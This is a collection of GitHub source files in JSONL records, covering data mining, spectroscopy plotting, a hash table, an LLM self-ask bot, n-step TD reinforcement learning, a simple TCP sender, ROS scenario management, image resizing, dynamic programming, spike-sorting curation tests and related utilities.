+{"seq_id":"6263693284","text":"import pandas as pd\r\nfrom efficient_apriori import apriori\r\ntran = [] #交易\r\n\r\nd = pd.read_csv('Market_Basket_Optimisation.csv', header = None)#读取文件中的数据\r\nfor a in range(0, d.shape[0]):\r\n temp = []\r\n for b in range(0, 20):\r\n if str(d.values[a, b]) != 'nan':\r\n temp.append(str(d.values[a, b]))\r\n 
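# each cleaned row becomes one transaction; apriori() expects a list of lists, e.g. [['shrimp', 'almonds'], ...]\r\n    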
tran.append(temp)\r\n\r\n#频繁项集和频繁规则\r\nprint(tran, '\\n')\r\npinfanxiangji, guanlianguize = apriori(tran, min_support = 0.02, min_confidence = 0.4)\r\nprint('频繁项集:', pinfanxiangji, '\\n')\r\nprint('关联规则:', guanlianguize)","repo_name":"qiushi-loves-life/DataEngine","sub_path":"第四课作业/第四课作业apriori.py","file_name":"第四课作业apriori.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37517608923","text":"#! /usr/bin/env python3\n\n########################################################\n# The example shows on top of example 5 how to extract #\n# the white-light image #\n########################################################\n\nimport numpy as np\nfrom renishawWiRE import WDFReader\nfrom _path import curdir, imgdir\n\ntry:\n import matplotlib.pyplot as plt\n import matplotlib.image as mpimg\n\n plot = True\nexcept ImportError:\n plot = False\n\n\ndef peak_in_range(spectra, wn, range, method=\"max\", **params):\n \"\"\"Find the max intensity of peak within range\n method can be max, min, or mean\n \"\"\"\n cond = np.where((wn >= range[0]) & (wn <= range[1]))[0]\n spectra_cut = spectra[:, :, cond]\n return getattr(np, method)(spectra_cut, axis=2, **params)\n\n\ndef main():\n filename = curdir / \"spectra_files\" / \"mapping.wdf\"\n reader = WDFReader(filename)\n assert reader.measurement_type == 3\n wn = reader.xdata\n spectra = reader.spectra\n\n print(wn.shape, spectra.shape)\n # Test newer API\n map_x = reader.xpos\n map_y = reader.ypos\n map_w = reader.map_info[\"x_span\"]\n map_h = reader.map_info[\"y_span\"]\n\n # w and h are the measure in xy coordinates\n # Level the spectra\n spectra = spectra - np.min(spectra, axis=2, keepdims=True)\n peaks_a = peak_in_range(spectra, wn, [1295, 1340])\n peaks_b = peak_in_range(spectra, wn, [1350, 1400])\n\n ratio = peaks_a / peaks_b\n\n if plot is True:\n # Must provide the format to read the optical image\n img = mpimg.imread(reader.img, format=\"jpg\")\n img_x0, img_y0 = reader.img_origins\n img_w, img_h = reader.img_dimensions\n print(reader.img_dimensions)\n plt.figure(figsize=(10, 5))\n\n # Left, plot the white light image and rectangle area\n plt.subplot(121)\n # Show the image with upper origin extent See\n # https://matplotlib.org/3.1.1/gallery/text_labels_and_annotations/text_alignment.html\n plt.imshow(img, extent=(img_x0, img_x0 + img_w, img_y0 + img_h, img_y0))\n # Add rectangle for marking\n r = plt.Rectangle(\n xy=(map_x.min(), map_y.min()), width=map_w, height=map_h, fill=False\n )\n plt.gca().add_patch(r)\n plt.xlabel(\"Stage X [μm]\")\n plt.ylabel(\"Stage Y [μm]\")\n\n # Right plot histogram of Peak A/B mapping\n plt.subplot(122)\n plt.imshow(\n ratio,\n interpolation=\"bicubic\",\n extent=[0, map_w, map_h, 0],\n vmin=0.5,\n vmax=1.5,\n )\n plt.xlabel(\"Mapping x [μm]\")\n plt.ylabel(\"Mapping y [μm]\")\n cb = plt.colorbar()\n cb.ax.set_title(\"Ratio\")\n plt.tight_layout()\n plt.show(block=False)\n plt.pause(3)\n plt.savefig(imgdir / \"map-optical.png\", dpi=100)\n plt.close()\n else:\n pass\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alchem0x2A/py-wdf-reader","sub_path":"examples/ex6_mapping_img.py","file_name":"ex6_mapping_img.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"26130481087","text":"class HashTable:\n def __init__(self, size):\n self.size = size\n self.table = [[] for _ in range(size)]\n\n 
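# Separate chaining: every slot holds a bucket (a list) of (key, value) pairs,\n    # so keys that collide on the same index coexist and are found by a linear scan.\n    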
def hash(self, key):\n return sum([ord(c) for c in key]) % self.size\n #Takes the sum of ascii values then mods by size of table\n # That gives us the index of the value to lookup\n\n\n\n\n\n#So here is the insert method that will insert a key value pair into the table\n#If they key already exists the value will be replaced.\n#Because we are looping through the list its O(n) for the worst case.\n#The bucket is the list at the index of the hash key\n#This makes it so we can have multiple values at the same index\n #Big O is O(n)\n def insert(self, key, value):\n hash_key = self.hash(key)\n bucket = self.table[hash_key]\n for i, (k, v) in enumerate(bucket):\n if k == key:\n bucket[i] = (key, value)\n return\n bucket.append((key, value))\n\n#This is the lookup method that will return the value of the key\n#If the key does not have any values in the bucket it will raise a key error\n #Big O is O(n)\n def lookup(self, key):\n hash_key = self.hash(key)\n bucket = self.table[hash_key]\n for k, v in bucket:\n if k == key:\n return v\n raise KeyError(key)\n\n def contains(self, address):\n for i in range(len(self.table)):\n if self.table[i] == address:\n return True\n\n\n\n\n","repo_name":"DavidBoudrot/DjikstraWithMultithreading","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18593235549","text":"from typing import List, Tuple\n\nfrom ..structs import Result\nfrom ..turbo import turbo\nfrom ..types.generators import TurboGenFn\nfrom .subqueries import subqueries_bot\n\n__all__ = [\n \"self_ask_bot\",\n]\n\n\n# Utils\ndef make_qa_context(qa_context, previous_qa):\n \"\"\"Prepare qa context.\"\"\"\n\n # Add previous q&a as faq\n if len(previous_qa):\n qas = \"\\n\\n\".join([f\"Q: {q}\\nA: {a}\" for q, a in previous_qa])\n\n qa_context += \"FAQ:\\n\"\n qa_context += qas\n\n return qa_context\n\n\n@turbo(temperature=0.7)\nasync def self_ask_bot(\n question: str,\n context: str,\n qa_bot: TurboGenFn,\n subquery_instructions: str = \"User is asking questions to an AI assistant.\",\n):\n \"\"\"Takes a question and qa_bot and uses them to answer step by step.\"\"\"\n\n # Generate sub queries\n queries = await subqueries_bot(\n request=question,\n context=subquery_instructions,\n ).run()\n\n # Answer sub-questions\n previous_qa: List[Tuple[str, str]] = []\n\n for query in [*queries.content, question]:\n # Generate new answer\n answer = await qa_bot(\n question=query,\n context=make_qa_context(context, previous_qa),\n ).run()\n\n # Append query and answer to list\n previous_qa.append((query, answer.content))\n\n # Yield the last answer as the result\n yield Result(content=previous_qa[-1][-1])\n","repo_name":"julep-ai/turbo-ai","sub_path":"turbo_chat/bots/self_ask.py","file_name":"self_ask.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"42637160372","text":"import sys\nimport gym\nimport numpy as np\nfrom tqdm import tqdm\nimport argparse\nif \"../\" not in sys.path: sys.path.append(\"../\")\nfrom lib.common_utils import TabularUtils\nfrom ch04_DP.DP import Tabular_DP\nfrom TD_learning import Tabular_TD\nfrom lib.regEnvs import *\n\n\nclass Tabular_nStepTD:\n def __init__(self, args):\n self.env = args.env\n self.num_episodes=10000\n self.gamma = 0.99\n self.alpha = 0.05\n self.env_nA = self.env.action_space.n\n self.env_nS = 
self.env.observation_space.n\n self.tabularUtils = TabularUtils(self.env)\n \n def nStepTD_prediction(self, policy, n):\n V_est = np.zeros(self.env_nS)\n for epi in range(self.num_episodes):\n done = False\n t = 0\n s = self.env.reset()\n T = float(\"inf\")\n S = []\n S.append(s) # append intial state\n R = []\n R.append(0.0)\n while True:\n if t < T:\n a = np.argmax(policy[s])\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next)\n R.append(r)\n if done:\n T = t+1\n # the time step whose state’s estimate is being updated\n τ = t - n + 1\n if τ >= 0:\n # compute return G\n G = 0\n for i in range(τ+1, min(τ+n, T)+1):\n G += (self.gamma**(i-τ-1)) * R[i]\n if τ + n < T:\n G = G + (self.gamma**n) * V_est[S[τ+n]]\n V_est[S[τ]] = V_est[S[τ]] + self.alpha * (G - V_est[S[τ]])\n\n # move to next time step\n s = s_next\n t += 1\n\n if τ == T-1:\n break\n\n return V_est\n\n\n def nStep_sarsa(self, n):\n Q = np.zeros((self.env_nS, self.env_nA))\n for epi in range(self.num_episodes):\n S = []; R = []; A = []\n R.append(0.0)\n s = self.env.reset()\n S.append(s) # append intial state\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n T = float(\"inf\")\n t = 0\n while True:\n # print(\"time step is %d\" %t)\n if t < T:\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next); R.append(r)\n if done:\n T = t+1\n else:\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n tau = t - n + 1\n if tau >= 0:\n # compute return G\n G = 0\n for i in range(tau+1, min(tau+n, T)+1):\n G += (self.gamma**(i-tau-1)) * R[i]\n if tau + n < T:\n G = G + (self.gamma**n) * Q[S[tau+n], A[tau+n]]\n Q[S[tau], A[tau]] = Q[S[tau], A[tau]] + self.alpha * (G - Q[S[tau], A[tau]])\n\n # move to next time step\n s = s_next\n t += 1\n\n if tau == T-1:\n break\n \n greedy_policy = self.tabularUtils.Q_value_to_greedy_policy(Q)\n\n return Q, greedy_policy\n \n\n def nStep_offPolicy_sarsa(self, n):\n \"\"\"\n policy pi is a greedy policy regarding Q \n policy b, the behaviour policy is a epsilon-greedy policy regarding Q\n \"\"\"\n Q = np.zeros((self.env_nS, self.env_nA))\n pi = np.zeros((self.env_nS, self.env_nA))\n b = np.zeros((self.env_nS, self.env_nA))\n for epi in range(self.num_episodes):\n S = []; R = []; A = []\n R.append(0.0)\n s = self.env.reset()\n S.append(s) # append intial state\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n T = float(\"inf\")\n t = 0\n while True:\n # print(\"time step is %d\" %t)\n if t < T:\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next); R.append(r)\n if done:\n T = t+1\n else:\n a = np.argmax(b[s, :])\n A.append(a)\n tau = t - n + 1\n if tau >= 0:\n for i in range(tau+1, min(tau+n, T)+1):\n ro *= 1\n # compute return G\n G = 0\n for i in range(tau+1, min(tau+n, T)+1):\n G += (self.gamma**(i-tau-1)) * R[i]\n if tau + n < T:\n G = G + (self.gamma**n) * Q[S[tau+n], A[tau+n]]\n Q[S[tau], A[tau]] = Q[S[tau], A[tau]] + self.alpha * ro * (G - Q[S[tau], A[tau]])\n\n # update pi and b\n pi = self.tabularUtils.Q_value_to_greedy_policy(Q)\n b = self.tabularUtils.Q_value_to_epison_greedy_policy(Q)\n\n # move to next time step\n s = s_next\n t += 1\n\n if tau == T-1:\n break\n \n return Q, pi\n\n\n def nStep_tree_backup(self, n):\n Q = np.zeros((self.env_nS, self.env_nA))\n pi = np.zeros((self.env_nS, self.env_nA))\n for epi in range(self.num_episodes):\n S = []; R = []; A = []\n R.append(0.0)\n s = self.env.reset()\n S.append(s) # append intial state\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n T = 
float(\"inf\")\n t = 0\n while True:\n # print(\"time step is %d\" %t)\n if t < T:\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next); R.append(r)\n if done:\n T = t+1\n else:\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n tau = t - n + 1\n if tau >= 0:\n # compute return G\n G = 0\n if t+1 >= T:\n G = R[T]\n else:\n G += R[t] + self.gamma * np.dot(pi[S[t+1], :], Q[S[t+1], :])\n for k in reversed(range(tau+1, min(t, T-1))):\n # print(\"current k is %d\" %k)\n G = R[k] + self.gamma * np.dot(np.delete(pi[S[k], :], a), np.delete(Q[S[k], :],a)) + \\\n self.gamma * pi[S[k], A[k]] * G\n\n Q[S[tau], A[tau]] = Q[S[tau], A[tau]] + self.alpha * (G - Q[S[tau], A[tau]])\n pi = self.tabularUtils.Q_value_to_greedy_policy(Q)\n\n # move to next time step\n s = s_next\n t += 1\n\n if tau == T-1:\n break\n\n return Q, pi\n \n\n def nStep_Q_delta(self, n):\n pass\n \n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--env_name', dest='env_name', type=str,\n default=\"FrozenLake-Deterministic-v1\",\n choices=[\"gridworld\", \"FrozenLake-v1\"])\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n args.env = gym.make(args.env_name)\n tabular_utils = TabularUtils(args.env)\n\n dp = Tabular_DP(args)\n V_optimal_VI, policy_optimal = dp.value_iteration()\n print(\"Optimal value function from VI\")\n print(V_optimal_VI)\n print(\"Optimal policy from VI\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_optimal))\n\n nstep_td = Tabular_nStepTD(args)\n n = 5\n V_est_nstepTD = nstep_td.nStepTD_prediction(policy_optimal, n)\n print(V_est_nstepTD)\n print(\"mean abs error of n-step TD prediction: %5f\" %np.mean(np.abs(V_est_nstepTD - V_optimal_VI)))\n\n Q_nStepSarsa, policy_nStepSarsa = nstep_td.nStep_sarsa(n)\n print(\"Policy from n-step sarsa\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_nStepSarsa))\n\n Q_nStepOffPolicySarsa, policy_nStepOffPolicySarsa = nstep_td.nStep_sarsa(n)\n print(\"Policy from n-step off-policy sarsa\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_nStepOffPolicySarsa))\n\n Q_nStepTreeBackup, policy_nStepTreeBackup = nstep_td.nStep_tree_backup(n)\n print(\"Policy from n-step tree backup\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_nStepTreeBackup))\n\n learned_policy = policy_nStepSarsa\n tabular_utils.render(learned_policy)\n\n","repo_name":"JeffreyYH/rlbook-drl","sub_path":"ch06to07_TD/nStep_TD.py","file_name":"nStep_TD.py","file_ext":"py","file_size_in_byte":8849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10553648792","text":"import socket\r\nimport time\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Creating socket\r\n\r\n\r\nHost = input(\"Enter the address of the host: \")\r\nPort = int(input(\"Please specify the port: \"))\r\npayload = input(\"Enter your payload: \")\r\n\r\n\r\nprint(\"[+]Connecting to host...\")\r\ntime.sleep(2)\r\n\r\ntry:\r\n s.connect((Host, Port)) #Checking to see if connection was successfull\r\n\r\nexcept OSError as msg:\r\n s.close()\r\n s = None\r\n\r\nif s is None:\r\n print(\"[-]Something went wrong. 
Please try again.\")\r\nelse:\r\n    print(\"[+]Connection successful...\")\r\n    time.sleep(1)\r\n    print(\"[+]Sending payload...\")\r\n    s.sendall(str.encode(payload))\r\n    data = s.recv(1024)\r\n\r\nprint('Received', repr(data)) # Receiving data back\r\n\r\n","repo_name":"Tom-project/General","sub_path":"CustomScripts/PayloadSender.py","file_name":"PayloadSender.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1074169387","text":"#!/usr/bin/env python\nimport rospy\nimport actionlib\nimport custom_msgs.msg\nfrom hbba_msgs.msg import Desire, Event\nfrom hbba_msgs.srv import AddDesires, RemoveDesires\nfrom scenario_manager_action_server import ScenarioManagerAction\nfrom states import state_00, state_01, state_02, state_03, state_04\n\nclass Scenario2Manager(ScenarioManagerAction):\n\n    def __init__(self):\n        ScenarioManagerAction.__init__(self, name=\"scenario_2_manager\")\n        self.desires = {}\n        self.states = {}\n        self.current_state = None\n        self.reaction_events = [Event.ACC_ON, Event.ACC_OFF, Event.IMP_ON, Event.IMP_OFF]\n        # Get and add all states\n        self.add_state(state_00.State00(self.desires))\n        self.add_state(state_01.State01(self.desires))\n        self.add_state(state_02.State02(self.desires))\n        self.add_state(state_03.State03(self.desires))\n        self.add_state(state_04.State04(self.desires))\n        self.register_preempt_callback(self.canceled_cb)\n        self.rem_desires = rospy.ServiceProxy('remove_desires', RemoveDesires)\n        rospy.wait_for_service(\"remove_desires\")\n\n    def add_state(self, state):\n        key = state.get_id()\n\n        if key not in self.states.keys():\n            self.states[key] = state\n\n        if self.current_state is None:\n            # track states by their id string so later dict lookups work\n            self.current_state = key\n\n    def observe(self):\n        self.sub_desires = rospy.Subscriber(\"events\", Event, self.eventCB, queue_size=5)\n\n    def stopObserving(self):\n        self.sub_desires.unregister()\n\n    def eventCB(self, event):\n        # Update own desire states w/ events seen\n        if event.desire in self.desires:\n            if event.type in self.reaction_events:\n                self.desires[event.desire] = event.type\n\n        react_result = self.states[self.current_state].react_to_event()\n\n        if react_result is not None:\n            self.states[self.current_state].cleanup()\n\n            if react_result == \"Done\":\n                self._result.result = True\n                self._as.set_succeeded(self._result)\n\n                self.current_state = \"state_00\"\n                self.stopObserving()\n            \n            else:\n                self._feedback.prev_state = self.current_state\n                self.current_state = react_result\n\n                self._feedback.state = react_result\n                self._as.publish_feedback(self._feedback)\n\n            self.states[self.current_state].add_desires()\n        \n    def execute_cb(self, goal):\n        if goal.execute is True:\n            self.observe()\n            # initial desire addition\n            self.states[self.current_state].add_desires()\n        else:\n            pass\n            # no stuff\n\n    def canceled_cb(self):\n        for desire in self.desires:\n            self.rem_desires.call(desire)\n        self.desires.clear()\n        self.current_state = \"state_00\"\n        self._as.set_preempted()\n        self.stopObserving()\n\nclass Scenario1Tester:\n    def __init__(self):\n        client = actionlib.SimpleActionClient(\"sc1tester\", custom_msgs.msg.scenario_managerAction)\n        client.wait_for_server()\n        goal = custom_msgs.msg.scenario_managerGoal(execute=True)\n        client.send_goal(goal)\n\n\nif __name__ == \"__main__\":\n    try:\n        rospy.init_node(\"scenario_2_manager\")\n\n        node = Scenario2Manager()\n        
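# constructing the tester immediately sends an \"execute\" goal to the action server\n        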
doTest = Scenario1Tester()\n\n rospy.spin()\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AlexCampanozzi/HomoDeUS","sub_path":"homodeus_motivations/scenarios/motv_scenario_2.py","file_name":"motv_scenario_2.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41029363515","text":"import os\nimport cv2\n\n#Make Sure your directory doesn't have any other type of files. And only contains images.\n\ndef resize_imgs(path, width, height):\n if not os.path.exists('resize'):\n os.makedirs('resize')\n images = os.listdir(path)\n \n for i in range(len(images)):\n img = cv2.imread(os.path.join(path, images[i]), cv2.IMREAD_GRAYSCALE)\n resized = cv2.resize(img, (width, height))\n cv2.imwrite(\"resize/\"+images[i], resized)\n \nresize_imgs('background', 64, 64)","repo_name":"shashankshirol/Crowd-scene-analysis","sub_path":"Processing/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74222908008","text":"#User function Template for python3\n\nclass Solution:\n def cutRod(self, pr, n):\n #code here\n \n dp=[[-1 for i in range(n+1)] for j in range(n)]\n def ans(ind,tar):\n if ind==0:\n return pr[0]*tar\n if dp[ind][tar]!=-1:\n return dp[ind][tar]\n nt=ans(ind-1,tar)\n tk=-1000\n rod=ind+1\n if rod<=tar:\n tk=pr[ind]+ans(ind,tar-rod)\n dp[ind][tar]=max(nt,tk)\n return max(nt,tk)\n \n return ans(n-1,n)\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\ndef main():\n\n T = int(input())\n\n while(T > 0):\n n = int(input())\n a = [int(x) for x in input().strip().split()]\n ob = Solution()\n print(ob.cutRod(a, n))\n\n T -= 1\n\n\nif __name__ == \"__main__\":\n main()\n# } Driver Code Ends","repo_name":"abhi-apple/leetcode","sub_path":"Rod Cutting - GFG/rod-cutting.py","file_name":"rod-cutting.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32378065273","text":"from absl import flags\n\n# GCP\nKUBE_CONTEXT = flags.DEFINE_string(\"kube_context\",\n default=None,\n help=\"Kubectl context to use\")\nSECONDARY_KUBE_CONTEXT = flags.DEFINE_string(\n \"secondary_kube_context\",\n default=None,\n help=\"Secondary kubectl context to use for cluster in another region\")\nGCP_SERVICE_ACCOUNT = flags.DEFINE_string(\n \"gcp_service_account\",\n default=None,\n help=\"GCP Service account for GKE workloads to impersonate\")\nTD_BOOTSTRAP_IMAGE = flags.DEFINE_string(\n \"td_bootstrap_image\",\n default=None,\n help=\"Traffic Director gRPC Bootstrap Docker image\")\n\n# Test app\nSERVER_IMAGE = flags.DEFINE_string(\"server_image\",\n default=None,\n help=\"Server Docker image name\")\nSERVER_IMAGE_CANONICAL = flags.DEFINE_string(\n \"server_image_canonical\",\n default=None,\n help=(\"The canonical implementation of the xDS test server.\\n\"\n \"Can be used in tests where language-specific xDS test server\"\n \"does not exist, or missing a feature required for the test.\"))\nCLIENT_IMAGE = flags.DEFINE_string(\"client_image\",\n default=None,\n help=\"Client Docker image name\")\nDEBUG_USE_PORT_FORWARDING = flags.DEFINE_bool(\n \"debug_use_port_forwarding\",\n default=False,\n help=\"Development only: use kubectl port-forward to connect to test app\")\nENABLE_WORKLOAD_IDENTITY = flags.DEFINE_bool(\n \"enable_workload_identity\",\n default=True,\n 
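# on by default; absl also generates --noenable_workload_identity to turn it off\n    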
help=\"Enable the WorkloadIdentity feature\")\n\nflags.mark_flags_as_required([\n \"kube_context\",\n \"td_bootstrap_image\",\n \"server_image\",\n \"client_image\",\n])\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/grpc/src/tools/run_tests/xds_k8s_test_driver/framework/xds_k8s_flags.py","file_name":"xds_k8s_flags.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"43831092620","text":"from multiprocessing import Process\nimport time\n\n\nclass BaseWorkerProcess(Process):\n \"\"\"Class that abstracts the communication to the master process.\n\n Parameters\n ----------\n conn : multiprocessing.Connection\n Connection to communicate to the master process.\n id : int\n ID of the worker (n cpu).\n ready_val : multiprocessing.Value\n Boolean shared value that indicates if the master process has processed\n the data from the workers.\n lock : multiprocessing.Lock\n A lock to for the ready_val.\n\n Attributes\n ----------\n work : boolean\n Status variable that keeps the worker working.\n conn : multiprocessing.Connection\n Connection to communicate to the master process.\n id : int\n ID of the worker (n cpu).\n ready_val : multiprocessing.Value\n Boolean shared value that indicates if the master process has processed\n the data from the workers.\n lock : multiprocessing.Lock\n A lock to for the ready_val.\n\n \"\"\"\n def __init__(self, conn, id, ready_val, lock, start_with_work=True):\n \"\"\"Constructor.\n\n Parameters\n ----------\n conn : multiprocessing.Connection\n Connection to communicate to the master process.\n id : int\n ID of the worker (n cpu).\n ready_val : multiprocessing.Value\n Boolean shared value that indicates if the master process has processed\n the data from the workers.\n lock : multiprocessing.Lock\n A lock to for the ready_val.\n \"\"\"\n super().__init__()\n self.conn = conn\n self.id = id\n self.ready_val = ready_val\n self.lock = lock\n self.work = True\n self.start_with_work = start_with_work\n print(\"init:\", self.id)\n\n def on_master_progress(self, msg):\n \"\"\"Callback method after the master process has done its work.\n\n Parameters\n ----------\n msg : sring\n Instruction from the master process\n \"\"\"\n pass\n\n def progress(self):\n \"\"\"Method in which the worker can do its work.\"\"\"\n pass\n\n def on_worker_start(self):\n \"\"\"Callback method to preprare before the worker loop begins.\"\"\"\n pass\n\n def check_master_progress(self):\n \"\"\"Wait till the master sends new instructions.\"\"\"\n if self.conn.poll(timeout=None):\n try:\n msg = self.conn.recv()\n except EOFError:\n print(\"EOFError occured\")\n msg = \"stop\"\n #print(\"check master process message:\", msg)\n if msg == \"stop\":\n self.work = False\n return\n self.on_master_progress(msg)\n\n def release_lock(self):\n time.sleep(0.2)\n self.lock.release()\n\n def run(self):\n \"\"\"Main method of the worker.\"\"\"\n self.on_worker_start()\n print(\"ready:\", self.id)\n if self.start_with_work:\n while(True):\n time.sleep(0.5)\n self.lock.acquire()\n if self.ready_val.value == 1:\n self.release_lock()\n break\n self.release_lock()\n print(\"start:\", self.id)\n while self.work:\n progress = self.progress()\n self.conn.send(progress)\n #print(self.id, \": progress send\")\n self.ready_val.value = 0\n while True:\n time.sleep(0.5)\n self.lock.acquire()\n if self.ready_val.value == 1:\n self.release_lock()\n break\n self.release_lock()\n self.ready_val.value = 
0\n #print(self.id, \": check master - reset ready val\")\n self.check_master_progress()\n else:\n print(\"start:\", self.id)\n while self.work:\n self.ready_val.value = 0\n while True:\n time.sleep(0.5)\n self.lock.acquire()\n if self.ready_val.value == 1:\n self.release_lock()\n break\n self.release_lock()\n self.ready_val.value = 0\n #print(\"check cmd\", self.id)\n self.check_master_progress()\n progress = self.progress()\n self.conn.send(progress)\n #print(self.id, \": progress send\")\n #print(self.id, \": check master - reset ready val\")\n\n\n print(\"worker\", self.id, \"done\")\n","repo_name":"mati3230/PointNetTransfer","sub_path":"optimization/base_worker_process.py","file_name":"base_worker_process.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888251217","text":"import pytest\n\nfrom spikeinterface.core import NumpySorting\nimport numpy as np\nfrom spikeinterface.curation import CurationSorting, MergeUnitsSorting, SplitUnitSorting\n\n\ndef test_split_merge():\n spikestimes = [\n {\n 0: np.arange(15),\n 1: np.arange(17),\n 2: np.arange(17) + 5,\n 4: np.concatenate([np.arange(10), np.arange(20, 30)]),\n 5: np.arange(9),\n },\n {0: np.arange(15), 1: np.arange(17), 2: np.arange(40, 140), 4: np.arange(40, 140), 5: np.arange(40, 140)},\n ]\n parent_sort = NumpySorting.from_unit_dict(spikestimes, sampling_frequency=1000) # to have 1 sample=1ms\n parent_sort.set_property(\"someprop\", [float(k) for k in spikestimes[0].keys()]) # float\n\n # %%\n split_index = [v[4] % 2 for v in spikestimes] # spit class 4 in even and odds\n splited = SplitUnitSorting(\n parent_sort, split_unit_id=4, indices_list=split_index, new_unit_ids=[8, 10], properties_policy=\"keep\"\n )\n merged = MergeUnitsSorting(splited, units_to_merge=[[8, 10]], new_unit_ids=[4], properties_policy=\"keep\")\n for i in range(len(spikestimes)):\n assert (\n all(parent_sort.get_unit_spike_train(4, segment_index=i) == merged.get_unit_spike_train(4, segment_index=i))\n == True\n ), \"splir or merge error\"\n assert parent_sort.get_unit_property(4, \"someprop\") == merged.get_unit_property(4, \"someprop\"), (\n \"property wasn\" \"t kept\"\n )\n\n merged_with_dups = MergeUnitsSorting(\n parent_sort, new_unit_ids=[8], units_to_merge=[[0, 1]], properties_policy=\"remove\", delta_time_ms=0.5\n )\n for i in range(len(spikestimes)):\n assert all(\n merged_with_dups.get_unit_spike_train(8, segment_index=i)\n == parent_sort.get_unit_spike_train(1, segment_index=i)\n ), \"error removing duplications\"\n assert np.isnan(merged_with_dups.get_unit_property(8, \"someprop\")), \"error creating empty property\"\n\n\ndef test_curation():\n spikestimes = [\n {\n \"a\": np.arange(15),\n \"b\": np.arange(5, 10),\n \"c\": np.arange(20),\n },\n {\"a\": np.arange(12, 15), \"b\": np.arange(3, 17), \"c\": np.arange(50)},\n ]\n parent_sort = NumpySorting.from_unit_dict(spikestimes, sampling_frequency=1000) # to have 1 sample=1ms\n parent_sort.set_property(\"some_names\", [\"unit_{}\".format(k) for k in spikestimes[0].keys()]) # float\n cs = CurationSorting(parent_sort, properties_policy=\"remove\")\n # %%\n cs.merge([\"a\", \"c\"])\n assert cs.sorting.get_num_units() == len(spikestimes[0]) - 1\n split_index = [v[\"b\"] < 6 for v in spikestimes] # split class 4 in even and odds\n cs.split(\"b\", split_index)\n after_split = cs.sorting\n assert cs.sorting.get_num_units() == len(spikestimes[0])\n\n all_units = cs.sorting.get_unit_ids()\n 
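# merge every remaining unit into one; the surviving unit keeps the first unit's id\n    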
cs.merge(all_units, new_unit_id=all_units[0])\n assert len(cs.sorting.get_unit_ids()) == 1, \"error merging units\"\n assert cs.sorting.unit_ids[0] == all_units[0]\n cs.undo()\n\n assert cs.sorting is after_split\n cs.redo()\n unit = cs.sorting.get_unit_ids()[0]\n for i in range(len(spikestimes)):\n assert all(\n cs.sorting.get_unit_spike_train(unit, segment_index=i)\n == parent_sort.get_unit_spike_train(\"c\", segment_index=i)\n )\n\n # Test with empty sorting\n empty_sorting = CurationSorting(NumpySorting.from_unit_dict({}, parent_sort.sampling_frequency))\n\n\nif __name__ == \"__main__\":\n test_split_merge()\n test_curation()\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/curation/tests/test_curationsorting.py","file_name":"test_curationsorting.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"7834238966","text":"#%%dpix=0.054th\nimport autolens as al\nimport numpy as np\nimport grid_util\n\ngrid_data = al.Grid2D.uniform(shape_native=(20,20), pixel_scales=0.5, sub_size=1)\nxgrid_data = grid_data.native[:,:,1]\nygrid_data = grid_data.native[:,:,0]\nrgrid = np.sqrt(xgrid_data**2 + ygrid_data**2)\nannular_mask = np.logical_or(rgrid<1.5, rgrid>4.0)\ngrid_obj = grid_util.SparseDpsiGrid(annular_mask, 0.5, shape_2d_dpsi=(10,10))\ngrid_obj.show_grid()\n\n# %%\ngrid_obj.get_diff_4th_reg_operator_dpsi()\nHy_dpsi_4th_reg, Hx_dpsi_4th_reg = grid_obj.Hy_dpsi_4th_reg, grid_obj.Hx_dpsi_4th_reg\nnp.savetxt('./Hy_dpsi_4th_reg.txt', Hy_dpsi_4th_reg, 